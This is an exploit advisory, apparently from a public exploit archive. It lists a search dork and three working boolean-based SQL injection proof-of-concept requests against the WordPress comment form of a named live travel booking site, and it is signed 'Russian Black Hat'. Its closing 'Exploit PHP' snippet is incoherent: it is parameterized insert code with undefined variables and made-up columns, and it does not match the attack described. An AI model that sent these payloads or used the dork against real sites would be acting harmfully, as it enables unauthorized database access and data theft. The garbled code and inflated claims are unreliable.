Flightio.com suffers from a remote SQL injection vulnerability. The researchers reporting this claimed the site has not responded to their reports so we are posting this to add visibility to the issue.
This site which has a security problem with the SQL INJECTION Vulnerability "CWE-89".
We have repeatedly reported to this site that it has a security problem and has ignored our report.
We want to record this security issue
#########################################################################################################################
# #
# Exploit Title : Site Flight agency airpol the Islamic Republic of Iran SQL INJECTION Vulnerability #
# #
# Author : E1.Coders #
# #
# Contact : E1.Coders [at] Mail [dot] RU #
# #
# Portal Link : https://flightio.com/ #
# #
# Security Risk : Medium #
# #
# Description : All target's IRanian AIRPOT websites #
# #
# DorK : "inurl:wp-comments-post.php%5Eauthor=" #
# #
#########################################################################################################################
# #
# Expl0iTs: #
#
# vuln type : SQLInjection
#
# refer address : https://flightio.com/blog/attractions/best-chahbahar-attractions/
#
# request type : POST
#
# action url : https://flightio.com/blog/wp-comments-post.php^author=6463106&submit=ارسال دیدگاه&comment_post_ID=64505&akismet_comment_nonce=385c7c306e&ak_js=98&comment=WCRTEXTAREATESTINPUT8462957&ak_hp_textarea=WCRTEXTAREATESTINPUT2557057&comment_parent=0
#
# parameter : comment_parent
#
# description : POST SQL INJECTION BooleanBased String
#
# POC : https://flightio.com/blog/wp-comments-post.php^author=6463106&submit=ارسال/**/دیدگاه&comment_post_ID=64505&akismet_comment_nonce=385c7c306e&ak_js=98&comment=WCRTEXTAREATESTINPUT8462957&ak_hp_textarea=WCRTEXTAREATESTINPUT2557057&comment_parent=0%27/**/aNd/**/7462200=7462200/**/aNd/**/%276199%27=%276199
---------------------------------------
#
# Expl0iTs:
# vuln type : SQLInjection
#
# refer address : https://flightio.com/blog/travel-tips/norouz-holiday-trips-in-iran/
#
# request type : POST
#
# action url : https://flightio.com/blog/wp-comments-post.php^author=9640811&submit=ارسال دیدگاه&comment_post_ID=3173&comment_parent=0&akismet_comment_nonce=709cdb3e84&ak_js=154&comment=WCRTEXTAREATESTINPUT9791191&ak_hp_textarea=WCRTEXTAREATESTINPUT8111319
#
# parameter : ak_hp_textarea
#
# description : POST SQL INJECTION BooleanBased String
#
# POC : https://flightio.com/blog/wp-comments-post.php^author=9640811&submit=ارسال/**/دیدگاه&comment_post_ID=3173&comment_parent=0&akismet_comment_nonce=709cdb3e84&ak_js=154&comment=WCRTEXTAREATESTINPUT9791191&ak_hp_textarea=WCRTEXTAREATESTINPUT8111319%27)/**/aNd/**/4442431=4442431/**/aNd/**/(%276199%27)=(%276199
------------------------------------------------
# # Expl0iTs:
# vuln type : SQLInjection
#
# refer address : https://flightio.com/blog/travel-tips/hormuz-island-travel-guide/
#
# request type : POST
#
# action url : https://flightio.com/blog/wp-comments-post.php^submit=ارسال دیدگاه&comment_post_ID=64267&comment_parent=0&akismet_comment_nonce=57b7866a2c&ak_js=15&comment=WCRTEXTAREATESTINPUT9752286&ak_hp_textarea=WCRTEXTAREATESTINPUT5571116&author=99999999
#
# parameter : author
#
# description : POST SQL INJECTION BooleanBased String
#
# POC : https://flightio.com/blog/wp-comments-post.php^submit=ارسال/**/دیدگاه&comment_post_ID=64267&comment_parent=0&akismet_comment_nonce=57b7866a2c&ak_js=15&comment=WCRTEXTAREATESTINPUT9752286&ak_hp_textarea=WCRTEXTAREATESTINPUT5571116&author=99999999%27)/**/oR/**/6197419=6197419/**/aNd/**/(%276199%27)=(%276199 #
#########################################################################################################################
# #
# | Security Is JOCK | #
# #
# | Russian Black Hat | #
# #
#########################################################################################################################
Exploit PHP :
global $wpdb;
$author = '99999999';
$comment = 'WCRTEXTAREATESTINPUT9752286';
$ak_hp_textarea = 'WCRTEXTAREATESTINPUT5571116';
$wpdb->prepare(
"INSERT INTO wp_comments (comment_post_ID, comment_author, comment_content, comment_parent, akismet_comment_nonce, ak_js, author) VALUES (%d, %s, %s, %d, %s, %d, %d)",
$comment_post_ID, $comment_author, $comment_content, $comment_parent, $akismet_comment_nonce, $ak_js, $author
);
$wpdb->insert('wp_comments', array(
'comment_post_ID' => $comment_post_ID,
'comment_author' => $comment_author,
'comment_content' => $comment_content,
'comment_parent' => $comment_parent,
'akismet_comment_nonce' => $akismet_comment_nonce,
'ak_js' => $ak_js,
'author' => $author
));
